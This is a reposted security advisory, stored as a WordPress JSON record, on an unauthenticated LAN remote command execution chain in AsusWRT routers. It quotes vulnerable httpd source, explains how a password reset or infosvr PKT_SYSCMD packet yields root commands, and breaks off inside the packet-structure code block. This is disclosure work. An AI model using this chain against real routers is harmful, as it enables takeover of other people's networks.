{"id":11196,"date":"2018-01-22T14:19:15","date_gmt":"2018-01-22T22:19:15","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4967\/"},"modified":"2018-01-22T14:19:15","modified_gmt":"2018-01-22T22:19:15","slug":"news-4967","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/01\/22\/news-4967\/","title":{"rendered":"SSD Advisory \u2013 Hack2Win &#8211; Asus Unauthenticated LAN Remote Command Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 22 Jan 2018 11:50:36 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3589\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3589');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes two (2) vulnerabilities found in AsusWRT Version 3.0.0.4.380.7743. The combination of the vulnerabilities leads to LAN remote command execution on any Asus router. <\/p>\n<p>AsusWRT is &#8220;THE POWERFUL USER-FRIENDLY INTERFACE &#8211; The enhanced ASUSWRT graphical user interface gives you easy access to the 30-second, 3-step web-based installation process. It\u2019s also where you can configure AiCloud 2.0 and all advanced options. ASUSWRT is web-based, so it doesn\u2019t need a separate app, or restrict what you can change via mobile devices \u2014 you get full access to everything, from any device that can run a web browser&#8221;<\/p>\n<p>The vulnerabilities found are:<\/p>\n<ul>\n<li>Access bypass<\/li>\n<li>Configuration manipulation <\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Pedro Ribeiro (pedrib_at_gmail.com), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Asus were informed of the vulnerabilities and released patches to address them (version 3.0.0.4.384_10007).<\/p>\n<p>For more details: https:\/\/www.asus.com\/Static_WebPage\/ASUS-Product-Security-Advisory\/<br \/> <span id=\"more-3589\"><\/span><br \/> <strong>Vulnerabilities details<\/strong><br \/> The AsusWRT handle_request() code  allows an unauthenticated user to perform a POST request for certain actions.<\/p>\n<p>AsusWRT_source\/router\/httpd\/httpd.c:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a66636295033161758955\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> handle_request(void)  {  &#8230;  \t\t\t\t\thandler-&gt;auth(auth_userid, auth_passwd, auth_realm);  \t\t\t\t\tauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);    \t\t\t\t\tif (auth_result != 0)                                     &lt;&#8212; auth fails  \t\t\t\t\t{  \t\t\t\t\t\tif(strcasecmp(method, &#8220;post&#8221;) == 0){  \t\t\t\t\t\t\tif (handler-&gt;input) {  \t\t\t\t\t\t\t\thandler-&gt;input(file, conn_fp, cl, boundary);        &lt;&#8212; but POST request is still processed  \t\t\t\t\t\t\t}  \t\t\t\t\t\t\tsend_login_page(fromapp, auth_result, NULL, NULL, 0);  \t\t\t\t\t\t}  \t\t\t\t\t\t\/\/if(!fromapp) http_logout(login_ip_tmp, cookies);  \t\t\t\t\t\treturn;  \t\t\t\t\t}  &#8230;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p>By POSTing to vpnupload.cgi, we invoke do_vpnupload_post(), which sets NVRAM configuration values directly from the request.<\/p>\n<p>AsusWRT_source\/router\/httpd\/web.c:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a6663629503c450872471\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> do_vpnupload_post(char *url, FILE *stream, int len, char *boundary)  {  &#8230;  \t\tif (!strncasecmp(post_buf, &#8220;Content-Disposition:&#8221;, 20)) {  \t\t\tif(strstr(post_buf, &#8220;name=&#8221;file&#8221;&#8221;))  \t\t\t\tbreak;  \t\t\telse if(strstr(post_buf, &#8220;name=&#8221;&#8221;)) {  \t\t\t\toffset = strlen(post_buf);  \t\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);  \t\t\t\tlen -= strlen(post_buf) &#8211; offset;  \t\t\t\toffset = strlen(post_buf);  \t\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);  \t\t\t\tlen -= strlen(post_buf) &#8211; offset;  \t\t\t\tp = post_buf;  \t\t\t\tname = strstr(p, &#8220;&#8221;&#8221;) + 1;  \t\t\t\tp = strstr(name, &#8220;&#8221;&#8221;);  \t\t\t\tstrcpy(p++, &#8220;\u0000&#8221;);  \t\t\t\tvalue = strstr(p, &#8220;rnrn&#8221;) + 4;  \t\t\t\tp = strstr(value, &#8220;r&#8221;);  \t\t\t\tstrcpy(p, &#8220;\u0000&#8221;);  \t\t\t\t\/\/printf(&#8220;%s=%sn&#8221;, name, value);  \t\t\t\tnvram_set(name, value);  \t\t\t}  \t\t}  &#8230;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a6663629503c450872471-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a6663629503c450872471-26\">26<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-1\"><span class=\"crayon-e\">do_vpnupload_post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FILE *<\/span><span class=\"crayon-v\">stream<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">boundary<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-3\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-4\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-e\">strncasecmp<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Content-Disposition:&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-5\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;name=&#8221;file&#8221;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-6\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-st\">break<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-7\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;name=&#8221;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-8\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strlen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-9\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">fgets<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">MIN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stream<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-10\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strlen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-11\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strlen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-12\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">fgets<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">MIN<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">stream<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-13\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strlen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">offset<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-14\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">post_buf<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-15\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-16\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-17\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">strcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\u0000&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-18\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;rnrn&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-19\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">strstr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;r&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-20\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">strcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\u0000&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-21\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-c\">\/\/printf(&#8220;%s=%sn&#8221;, name, value);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-22\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">nvram_set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-23\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-24\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a6663629503c450872471-25\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a6663629503c450872471-26\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0035 seconds] -->  <\/p>\n<p>An attacker can trigger the vulnerabilities and reset the admin password. <\/p>\n<p>Once that is done, the attacker can login to the web interface with the new password, enable SSH, reboot the router and login via SSH.<\/p>\n<p>Another option is to abuse infosvr, which is a UDP daemon running on port 9999.<\/p>\n<p>The daemon has a command mode which is only enabled if ateCommand_flag is set to 1.<\/p>\n<p>This flag is only enabled in very special cases, but we can enable it using the VPN configuration upload technique described above.<\/p>\n<p>Once that is done, all we need to do is send a PKT_SYSCMD to infosvr.<\/p>\n<p>The daemon will read a command from the packet and execute it as root.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a66636295040817832852\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Packet structure (from AsusWRT_source\/router\/shared\/iboxcom.h):  &#8211; Header    typedef struct iboxPKTEx    {      BYTE\t\tServiceID;      BYTE\t\tPacketType;      WORD\t\tOpCode;      DWORD \t\tInfo; \/\/ Or Transaction ID      BYTE\t\tMacAddress[6];      BYTE\t\tPassword[32];   \/\/NULL terminated string, string length:1~31, cannot be NULL string    } ibox_comm_pkt_hdr_ex;    &#8211; Body    typedef struct iboxPKTCmd    {      WORD\t\tlen;      BYTE\t\tcmd[420];    } PKT_SYSCMD;\t\t\/\/ total 422 bytes<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a66636295040817832852-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a66636295040817832852-9\">9<\/div>\n<div 